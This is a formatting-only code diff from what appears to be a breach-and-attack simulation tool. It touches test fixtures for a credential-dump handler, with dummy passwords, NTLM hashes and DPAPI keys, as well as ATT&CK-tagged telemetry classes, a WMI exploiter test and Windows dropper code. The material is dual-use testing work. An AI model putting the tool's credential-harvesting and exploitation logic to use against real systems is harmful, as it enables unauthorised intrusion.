"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
},
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
},
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
},
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
},
{"credtype":"dpapi", "key_guid":"9123-123ae123de4-121239-3123-421f"},
{"credtype": "dpapi", "key_guid": "9123-123ae123de4-121239-3123-421f"},
],
"kerberos_creds":[
"kerberos_creds": [
{
"credtype":"kerberos",
"username":"monkey_kerb",
"password":None,
"domainname":"ReAlDoMaIn",
"luid":123086,
"tickets":[],
"credtype": "kerberos",
"username": "monkey_kerb",
"password": None,
"domainname": "ReAlDoMaIn",
"luid": 123086,
"tickets": [],
}
],
"credman_creds":[
"credman_creds": [
{
"credtype":"credman",
"username":"monkey",
"domainname":"monkey.ad.monkey.com",
"password":"canyoufindme2",
"luid":123086,
"credtype": "credman",
"username": "monkey",
"domainname": "monkey.ad.monkey.com",
"password": "canyoufindme2",
"luid": 123086,
},
{
"credtype":"credman",
"username":"monkey@monkey.com",
"domainname":"moneky.monkey.com",
"password":"canyoufindme1",
"luid":123086,
"credtype": "credman",
"username": "monkey@monkey.com",
"domainname": "moneky.monkey.com",
"password": "canyoufindme1",
"luid": 123086,
},
{
"credtype":"credman",
"username":"test",
"domainname":"test.test.ts",
"password":"canyoufindit",
"luid":123086,
"credtype": "credman",
"username": "test",
"domainname": "test.test.ts",
"password": "canyoufindit",
"luid": 123086,
},
],
"tspkg_creds":[],
"tspkg_creds": [],
}
def test__get_creds_from_pypykatz_session(self):
@ -132,27 +128,27 @@ class TestPypykatzHandler(TestCase):
test_dicts = [
{
"username":"monkey",
"ntlm_hash":"31b73c59d7e0c089c031d6cfe0d16ae9",
"password":"",
"lm_hash":"",
"username": "monkey",
"ntlm_hash": "31b73c59d7e0c089c031d6cfe0d16ae9",
"password": "",
"lm_hash": "",
},
{"username":"monkey", "ntlm_hash":"", "password":"canyoufindme", "lm_hash":""},
{"username": "monkey", "ntlm_hash": "", "password": "canyoufindme", "lm_hash": ""},
{
"username":"monkey123",
"ntlm_hash":"",
"password":"canyoufindme123",
"lm_hash":"",
"username": "monkey123",
"ntlm_hash": "",
"password": "canyoufindme123",
"lm_hash": "",
},
{"username":"monk3y", "ntlm_hash":"", "password":"canyoufindm3", "lm_hash":""},
{"username":"monkey", "ntlm_hash":"", "password":"canyoufindme2", "lm_hash":""},
{"username": "monk3y", "ntlm_hash": "", "password": "canyoufindm3", "lm_hash": ""},
{"username": "monkey", "ntlm_hash": "", "password": "canyoufindme2", "lm_hash": ""},
{
"username":"monkey@monkey.com",
"ntlm_hash":"",
"password":"canyoufindme1",
"lm_hash":"",
"username": "monkey@monkey.com",
"ntlm_hash": "",
"password": "canyoufindme1",
"lm_hash": "",
},
{"username":"test", "ntlm_hash":"", "password":"canyoufindit", "lm_hash":""},
{"username": "test", "ntlm_hash": "", "password": "canyoufindit", "lm_hash": ""},
]
results = [result.to_dict() for result in results]
[self.assertTrue(test_dict in results) for test_dict in test_dicts]

View File

@ -10,8 +10,8 @@ class WindowsCredentials:
def to_dict(self) -> Dict:
return {
"username":self.username,
"password":self.password,
"ntlm_hash":self.ntlm_hash,
"lm_hash":self.lm_hash,
"username": self.username,
"password": self.password,
"ntlm_hash": self.ntlm_hash,
"lm_hash": self.lm_hash,
}

View File

@ -17,7 +17,7 @@ WMI_CLASSES = {
# monkey should run as *** SYSTEM *** !!!
#
WMI_LDAP_CLASSES = {
"ds_user":(
"ds_user": (
"DS_sAMAccountName",
"DS_userPrincipalName",
"DS_sAMAccountType",
@ -36,7 +36,7 @@ WMI_LDAP_CLASSES = {
"DS_logonCount",
"DS_accountExpires",
),
"ds_group":(
"ds_group": (
"DS_whenChanged",
"DS_whenCreated",
"DS_sAMAccountName",
@ -52,7 +52,7 @@ WMI_LDAP_CLASSES = {
"DS_distinguishedName",
"ADSIPath",
),
"ds_computer":(
"ds_computer": (
"DS_dNSHostName",
"ADSIPath",
"DS_accountExpires",

View File

@ -44,8 +44,7 @@ class WindowsSystemSingleton(_SystemSingleton):
if not handle:
LOG.error(
"Cannot acquire system singleton %r, unknown error %d", self._mutex_name,
last_error
"Cannot acquire system singleton %r, unknown error %d", self._mutex_name, last_error
)
return False
if winerror.ERROR_ALREADY_EXISTS == last_error:

View File

@ -18,4 +18,4 @@ class AttackTelem(BaseTelem):
telem_category = TelemCategoryEnum.ATTACK
def get_data(self):
return {"status":self.status.value, "technique":self.technique}
return {"status": self.status.value, "technique": self.technique}

View File

@ -15,5 +15,5 @@ class T1005Telem(AttackTelem):
def get_data(self):
data = super(T1005Telem, self).get_data()
data.update({"gathered_data_type":self.gathered_data_type, "info":self.info})
data.update({"gathered_data_type": self.gathered_data_type, "info": self.info})
return data

View File

@ -15,5 +15,5 @@ class T1064Telem(AttackTelem):
def get_data(self):
data = super(T1064Telem, self).get_data()
data.update({"usage":self.usage})
data.update({"usage": self.usage})
return data

View File

@ -17,5 +17,5 @@ class T1105Telem(AttackTelem):
def get_data(self):
data = super(T1105Telem, self).get_data()
data.update({"filename":self.filename, "src":self.src, "dst":self.dst})
data.update({"filename": self.filename, "src": self.src, "dst": self.dst})
return data

View File

@ -13,5 +13,5 @@ class T1107Telem(AttackTelem):
def get_data(self):
data = super(T1107Telem, self).get_data()
data.update({"path":self.path})
data.update({"path": self.path})
return data

View File

@ -18,5 +18,5 @@ class T1197Telem(VictimHostTelem):
def get_data(self):
data = super(T1197Telem, self).get_data()
data.update({"usage":self.usage})
data.update({"usage": self.usage})
return data

View File

@ -14,5 +14,5 @@ class T1222Telem(VictimHostTelem):
def get_data(self):
data = super(T1222Telem, self).get_data()
data.update({"command":self.command})
data.update({"command": self.command})
return data

View File

@ -13,5 +13,5 @@ class UsageTelem(AttackTelem):
def get_data(self):
data = super(UsageTelem, self).get_data()
data.update({"usage":self.usage})
data.update({"usage": self.usage})
return data

View File

@ -13,9 +13,9 @@ class VictimHostTelem(AttackTelem):
:param machine: VictimHost obj from model/host.py
"""
super(VictimHostTelem, self).__init__(technique, status)
self.machine = {"domain_name":machine.domain_name, "ip_addr":machine.ip_addr}
self.machine = {"domain_name": machine.domain_name, "ip_addr": machine.ip_addr}
def get_data(self):
data = super(VictimHostTelem, self).get_data()
data.update({"machine":self.machine})
data.update({"machine": self.machine})
return data

View File

@ -19,9 +19,9 @@ class ExploitTelem(BaseTelem):
def get_data(self):
return {
"result":self.result,
"machine":self.exploiter.host.__dict__,
"exploiter":self.exploiter.__class__.__name__,
"info":self.exploiter.exploit_info,
"attempts":self.exploiter.exploit_attempts,
"result": self.result,
"machine": self.exploiter.host.__dict__,
"exploiter": self.exploiter.__class__.__name__,
"info": self.exploiter.exploit_info,
"attempts": self.exploiter.exploit_attempts,
}

View File

@ -22,11 +22,11 @@ class PostBreachTelem(BaseTelem):
def get_data(self):
return {
"command":self.pba.command,
"result":self.result,
"name":self.pba.name,
"hostname":self.hostname,
"ip":self.ip,
"command": self.pba.command,
"result": self.result,
"name": self.pba.name,
"hostname": self.hostname,
"ip": self.ip,
}
@staticmethod

View File

@ -16,4 +16,4 @@ class ScanTelem(BaseTelem):
telem_category = TelemCategoryEnum.SCAN
def get_data(self):
return {"machine":self.machine.as_dict(), "service_count":len(self.machine.services)}
return {"machine": self.machine.as_dict(), "service_count": len(self.machine.services)}

View File

@ -14,4 +14,4 @@ class ScoutSuiteTelem(BaseTelem):
telem_category = TelemCategoryEnum.SCOUTSUITE
def get_data(self):
return {"data":self.provider_data}
return {"data": self.provider_data}

View File

@ -17,4 +17,4 @@ class StateTelem(BaseTelem):
telem_category = TelemCategoryEnum.STATE
def get_data(self):
return {"done":self.is_done, "version":self.version}
return {"done": self.is_done, "version": self.version}

View File

@ -16,7 +16,7 @@ def attack_telem_test_instance():
def test_attack_telem_send(attack_telem_test_instance, spy_send_telemetry):
attack_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":TECHNIQUE}
expected_data = {"status": STATUS.value, "technique": TECHNIQUE}
expected_data = json.dumps(expected_data, cls=attack_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -18,10 +18,10 @@ def T1005_telem_test_instance():
def test_T1005_send(T1005_telem_test_instance, spy_send_telemetry):
T1005_telem_test_instance.send()
expected_data = {
"status":STATUS.value,
"technique":"T1005",
"gathered_data_type":GATHERED_DATA_TYPE,
"info":INFO,
"status": STATUS.value,
"technique": "T1005",
"gathered_data_type": GATHERED_DATA_TYPE,
"info": INFO,
}
expected_data = json.dumps(expected_data, cls=T1005_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -16,7 +16,7 @@ def T1035_telem_test_instance():
def test_T1035_send(T1035_telem_test_instance, spy_send_telemetry):
T1035_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1035", "usage":USAGE.name}
expected_data = {"status": STATUS.value, "technique": "T1035", "usage": USAGE.name}
expected_data = json.dumps(expected_data, cls=T1035_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"

View File

@ -16,7 +16,7 @@ def T1064_telem_test_instance():
def test_T1064_send(T1064_telem_test_instance, spy_send_telemetry):
T1064_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1064", "usage":USAGE_STR}
expected_data = {"status": STATUS.value, "technique": "T1064", "usage": USAGE_STR}
expected_data = json.dumps(expected_data, cls=T1064_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"

View File

@ -19,11 +19,11 @@ def T1105_telem_test_instance():
def test_T1105_send(T1105_telem_test_instance, spy_send_telemetry):
T1105_telem_test_instance.send()
expected_data = {
"status":STATUS.value,
"technique":"T1105",
"filename":FILENAME,
"src":SRC_IP,
"dst":DST_IP,
"status": STATUS.value,
"technique": "T1105",
"filename": FILENAME,
"src": SRC_IP,
"dst": DST_IP,
}
expected_data = json.dumps(expected_data, cls=T1105_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -16,7 +16,7 @@ def T1106_telem_test_instance():
def test_T1106_send(T1106_telem_test_instance, spy_send_telemetry):
T1106_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1106", "usage":USAGE.name}
expected_data = {"status": STATUS.value, "technique": "T1106", "usage": USAGE.name}
expected_data = json.dumps(expected_data, cls=T1106_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"

View File

@ -16,7 +16,7 @@ def T1107_telem_test_instance():
def test_T1107_send(T1107_telem_test_instance, spy_send_telemetry):
T1107_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1107", "path":PATH}
expected_data = {"status": STATUS.value, "technique": "T1107", "path": PATH}
expected_data = json.dumps(expected_data, cls=T1107_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"

View File

@ -16,7 +16,7 @@ def T1129_telem_test_instance():
def test_T1129_send(T1129_telem_test_instance, spy_send_telemetry):
T1129_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1129", "usage":USAGE.name}
expected_data = {"status": STATUS.value, "technique": "T1129", "usage": USAGE.name}
expected_data = json.dumps(expected_data, cls=T1129_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"

View File

@ -21,10 +21,10 @@ def T1197_telem_test_instance():
def test_T1197_send(T1197_telem_test_instance, spy_send_telemetry):
T1197_telem_test_instance.send()
expected_data = {
"status":STATUS.value,
"technique":"T1197",
"machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP},
"usage":USAGE_STR,
"status": STATUS.value,
"technique": "T1197",
"machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
"usage": USAGE_STR,
}
expected_data = json.dumps(expected_data, cls=T1197_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -21,10 +21,10 @@ def T1222_telem_test_instance():
def test_T1222_send(T1222_telem_test_instance, spy_send_telemetry):
T1222_telem_test_instance.send()
expected_data = {
"status":STATUS.value,
"technique":"T1222",
"machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP},
"command":COMMAND,
"status": STATUS.value,
"technique": "T1222",
"machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
"command": COMMAND,
}
expected_data = json.dumps(expected_data, cls=T1222_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -18,9 +18,9 @@ def usage_telem_test_instance():
def test_usage_telem_send(usage_telem_test_instance, spy_send_telemetry):
usage_telem_test_instance.send()
expected_data = {
"status":STATUS.value,
"technique":TECHNIQUE,
"usage":USAGE.name,
"status": STATUS.value,
"technique": TECHNIQUE,
"usage": USAGE.name,
}
expected_data = json.dumps(expected_data, cls=usage_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -21,9 +21,9 @@ def victim_host_telem_test_instance():
def test_victim_host_telem_send(victim_host_telem_test_instance, spy_send_telemetry):
victim_host_telem_test_instance.send()
expected_data = {
"status":STATUS.value,
"technique":TECHNIQUE,
"machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP},
"status": STATUS.value,
"technique": TECHNIQUE,
"machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
}
expected_data = json.dumps(expected_data, cls=victim_host_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -10,24 +10,24 @@ DOMAIN_NAME = "domain-name"
IP = "0.0.0.0"
HOST = VictimHost(IP, DOMAIN_NAME)
HOST_AS_DICT = {
"ip_addr":IP,
"domain_name":DOMAIN_NAME,
"os":{},
"services":{},
"icmp":False,
"monkey_exe":None,
"default_tunnel":None,
"default_server":None,
"ip_addr": IP,
"domain_name": DOMAIN_NAME,
"os": {},
"services": {},
"icmp": False,
"monkey_exe": None,
"default_tunnel": None,
"default_server": None,
}
EXPLOITER = WmiExploiter(HOST)
EXPLOITER_NAME = "WmiExploiter"
EXPLOITER_INFO = {
"display_name":WmiExploiter._EXPLOITED_SERVICE,
"started":"",
"finished":"",
"vulnerable_urls":[],
"vulnerable_ports":[],
"executed_cmds":[],
"display_name": WmiExploiter._EXPLOITED_SERVICE,
"started": "",
"finished": "",
"vulnerable_urls": [],
"vulnerable_ports": [],
"executed_cmds": [],
}
EXPLOITER_ATTEMPTS = []
RESULT = False
@ -41,11 +41,11 @@ def exploit_telem_test_instance():
def test_exploit_telem_send(exploit_telem_test_instance, spy_send_telemetry):
exploit_telem_test_instance.send()
expected_data = {
"result":RESULT,
"machine":HOST_AS_DICT,
"exploiter":EXPLOITER_NAME,
"info":EXPLOITER_INFO,
"attempts":EXPLOITER_ATTEMPTS,
"result": RESULT,
"machine": HOST_AS_DICT,
"exploiter": EXPLOITER_NAME,
"info": EXPLOITER_INFO,
"attempts": EXPLOITER_ATTEMPTS,
}
expected_data = json.dumps(expected_data, cls=exploit_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -20,18 +20,18 @@ class StubSomePBA:
@pytest.fixture
def post_breach_telem_test_instance(monkeypatch):
PBA = StubSomePBA()
monkeypatch.setattr(PostBreachTelem, "_get_hostname_and_ip", lambda:(HOSTNAME, IP))
monkeypatch.setattr(PostBreachTelem, "_get_hostname_and_ip", lambda: (HOSTNAME, IP))
return PostBreachTelem(PBA, RESULT)
def test_post_breach_telem_send(post_breach_telem_test_instance, spy_send_telemetry):
post_breach_telem_test_instance.send()
expected_data = {
"command":PBA_COMMAND,
"result":RESULT,
"name":PBA_NAME,
"hostname":HOSTNAME,
"ip":IP,
"command": PBA_COMMAND,
"result": RESULT,
"name": PBA_NAME,
"hostname": HOSTNAME,
"ip": IP,
}
expected_data = json.dumps(expected_data, cls=post_breach_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -9,14 +9,14 @@ DOMAIN_NAME = "domain-name"
IP = "0.0.0.0"
HOST = VictimHost(IP, DOMAIN_NAME)
HOST_AS_DICT = {
"ip_addr":IP,
"domain_name":DOMAIN_NAME,
"os":{},
"services":{},
"icmp":False,
"monkey_exe":None,
"default_tunnel":None,
"default_server":None,
"ip_addr": IP,
"domain_name": DOMAIN_NAME,
"os": {},
"services": {},
"icmp": False,
"monkey_exe": None,
"default_tunnel": None,
"default_server": None,
}
HOST_SERVICES = {}
@ -28,7 +28,7 @@ def scan_telem_test_instance():
def test_scan_telem_send(scan_telem_test_instance, spy_send_telemetry):
scan_telem_test_instance.send()
expected_data = {"machine":HOST_AS_DICT, "service_count":len(HOST_SERVICES)}
expected_data = {"machine": HOST_AS_DICT, "service_count": len(HOST_SERVICES)}
expected_data = json.dumps(expected_data, cls=scan_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -15,7 +15,7 @@ def state_telem_test_instance():
def test_state_telem_send(state_telem_test_instance, spy_send_telemetry):
state_telem_test_instance.send()
expected_data = {"done":IS_DONE, "version":VERSION}
expected_data = {"done": IS_DONE, "version": VERSION}
expected_data = json.dumps(expected_data, cls=state_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -14,7 +14,7 @@ def trace_telem_test_instance():
def test_trace_telem_send(trace_telem_test_instance, spy_send_telemetry):
trace_telem_test_instance.send()
expected_data = {"msg":MSG}
expected_data = {"msg": MSG}
expected_data = json.dumps(expected_data, cls=trace_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -12,7 +12,7 @@ def tunnel_telem_test_instance():
def test_tunnel_telem_send(tunnel_telem_test_instance, spy_send_telemetry):
tunnel_telem_test_instance.send()
expected_data = {"proxy":None}
expected_data = {"proxy": None}
expected_data = json.dumps(expected_data, cls=tunnel_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data

View File

@ -21,4 +21,4 @@ class TraceTelem(BaseTelem):
telem_category = TelemCategoryEnum.TRACE
def get_data(self):
return {"msg":self.msg}
return {"msg": self.msg}

View File

@ -16,4 +16,4 @@ class TunnelTelem(BaseTelem):
telem_category = TelemCategoryEnum.TUNNEL
def get_data(self):
return {"proxy":self.proxy}
return {"proxy": self.proxy}

View File

@ -82,8 +82,7 @@ class AutoNewWindowsUser(AutoNewUser):
thread_handle = proc_info.hThread
logger.debug(
"Waiting for process to finish. Timeout: {}ms".format(
WAIT_TIMEOUT_IN_MILLISECONDS)
"Waiting for process to finish. Timeout: {}ms".format(WAIT_TIMEOUT_IN_MILLISECONDS)
)
# https://social.msdn.microsoft.com/Forums/vstudio/en-US/b6d6a7ae-71e9-4edb-ac8f

View File

@ -46,8 +46,7 @@ class WindowsUpgrader(object):
)
monkey_cmdline = (
MONKEY_CMDLINE_WINDOWS % {
"monkey_path":WormConfiguration.dropper_target_path_win_64}
MONKEY_CMDLINE_WINDOWS % {"monkey_path": WormConfiguration.dropper_target_path_win_64}
+ monkey_options
)

View File

@ -175,7 +175,7 @@ def init_app(mongo_url):
app = Flask(__name__)
api = flask_restful.Api(app)
api.representations = {"application/json":output_json}
api.representations = {"application/json": output_json}
init_app_config(app, mongo_url)
init_app_services(app)

View File

@ -58,12 +58,12 @@ class EnvironmentConfig:
def to_dict(self) -> Dict:
config_dict = {
"server_config":self.server_config,
"deployment":self.deployment,
"data_dir":self.data_dir,
"server_config": self.server_config,
"deployment": self.deployment,
"data_dir": self.data_dir,
}
if self.aws:
config_dict.update({"aws":self.aws})
config_dict.update({"aws": self.aws})
config_dict.update(self.user_creds.to_dict())
return config_dict

View File

@ -13,9 +13,9 @@ STANDARD = "standard"
PASSWORD = "password"
ENV_DICT = {
STANDARD:standard.StandardEnvironment,
AWS:aws.AwsEnvironment,
PASSWORD:password.PasswordEnvironment,
STANDARD: standard.StandardEnvironment,
AWS: aws.AwsEnvironment,
PASSWORD: password.PasswordEnvironment,
}
env = None

View File

@ -9,13 +9,13 @@ class TestUserCreds(TestCase):
self.assertDictEqual(user_creds.to_dict(), {})
user_creds = UserCreds(username="Test")
self.assertDictEqual(user_creds.to_dict(), {"user":"Test"})
self.assertDictEqual(user_creds.to_dict(), {"user": "Test"})
user_creds = UserCreds(password_hash="abc1231234")
self.assertDictEqual(user_creds.to_dict(), {"password_hash":"abc1231234"})
self.assertDictEqual(user_creds.to_dict(), {"password_hash": "abc1231234"})
user_creds = UserCreds(username="Test", password_hash="abc1231234")
self.assertDictEqual(user_creds.to_dict(), {"user":"Test", "password_hash":"abc1231234"})
self.assertDictEqual(user_creds.to_dict(), {"user": "Test", "password_hash": "abc1231234"})
def test_to_auth_user(self):
user_creds = UserCreds(username="Test", password_hash="abc1231234")

View File

@ -17,9 +17,9 @@ class UserCreds:
def to_dict(self) -> Dict:
cred_dict = {}
if self.username:
cred_dict.update({"user":self.username})
cred_dict.update({"user": self.username})
if self.password_hash:
cred_dict.update({"password_hash":self.password_hash})
cred_dict.update({"password_hash": self.password_hash})
return cred_dict
def to_auth_user(self) -> User:

Some files were not shown because too many files have changed in this diff Show More